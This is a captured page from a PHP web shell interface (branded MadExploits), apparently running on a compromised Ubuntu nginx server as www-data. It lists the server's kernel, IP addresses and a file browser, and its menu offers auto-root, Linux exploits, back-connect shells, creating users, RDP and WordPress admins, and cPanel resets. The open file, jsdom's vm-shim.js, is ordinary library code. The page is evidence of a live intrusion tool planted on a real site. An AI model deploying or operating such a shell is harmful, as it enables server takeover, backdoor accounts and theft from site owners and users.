Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
jsdom /
lib /
jsdom /
[ HOME SHELL ]
Name
Size
Permission
Action
browser
[ DIR ]
dr-xr-xr-x
level2
[ DIR ]
dr-xr-xr-x
level3
[ DIR ]
dr-xr-xr-x
living
[ DIR ]
dr-xr-xr-x
named-properties-tracker.js
4.54
KB
-rw-rw-rw-
utils.js
4.36
KB
-rw-rw-rw-
virtual-console.js
760
B
-rw-rw-rw-
vm-shim.js
2.98
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : vm-shim.js
"use strict"; /* eslint-disable no-new-func */ const acorn = require("acorn"); const findGlobals = require("acorn-globals"); const escodegen = require("escodegen"); const jsGlobals = require("./browser/js-globals.json"); // We can't use the default browserify vm shim because it doesn't work in a web worker. // "eval" is skipped because it's set to a function that calls `runInContext`: const jsGlobalEntriesToInstall = Object.entries(jsGlobals).filter(([name]) => name !== "eval" && name in global); exports.createContext = function (sandbox) { // TODO: This should probably use a symbol Object.defineProperty(sandbox, "__isVMShimContext", { value: true, writable: true, configurable: true, enumerable: false }); for (const [globalName, globalPropDesc] of jsGlobalEntriesToInstall) { const propDesc = { ...globalPropDesc, value: global[globalName] }; Object.defineProperty(sandbox, globalName, propDesc); } Object.defineProperty(sandbox, "eval", { value(code) { return exports.runInContext(code, sandbox); }, writable: true, configurable: true, enumerable: false }); }; exports.isContext = function (sandbox) { return sandbox.__isVMShimContext; }; exports.runInContext = function (code, contextifiedSandbox, options) { if (code === "this") { // Special case for during window creation. return contextifiedSandbox; } if (options === undefined) { options = {}; } const comments = []; const tokens = []; const ast = acorn.parse(code, { allowReturnOutsideFunction: true, ranges: true, // collect comments in Esprima's format onComment: comments, // collect token ranges onToken: tokens }); // make sure we keep comments escodegen.attachComments(ast, comments, tokens); const globals = findGlobals(ast); for (let i = 0; i < globals.length; ++i) { if (globals[i].name === "window" || globals[i].name === "this") { continue; } const { nodes } = globals[i]; for (let j = 0; j < nodes.length; ++j) { const { type, name } = nodes[j]; nodes[j].type = "MemberExpression"; nodes[j].property = { name, type }; nodes[j].computed = false; nodes[j].object = { name: "window", type: "Identifier" }; } } const lastNode = ast.body[ast.body.length - 1]; if (lastNode.type === "ExpressionStatement") { lastNode.type = "ReturnStatement"; lastNode.argument = lastNode.expression; delete lastNode.expression; } const rewrittenCode = escodegen.generate(ast, { comment: true }); const suffix = options.filename !== undefined ? "\n//# sourceURL=" + options.filename : ""; return Function("window", rewrittenCode + suffix).bind(contextifiedSandbox)(contextifiedSandbox); }; exports.Script = class VMShimScript { constructor(code, options) { this._code = code; this._options = options; } runInContext(sandbox, options) { return exports.runInContext(this._code, sandbox, { ...this._options, ...options }); } };
Close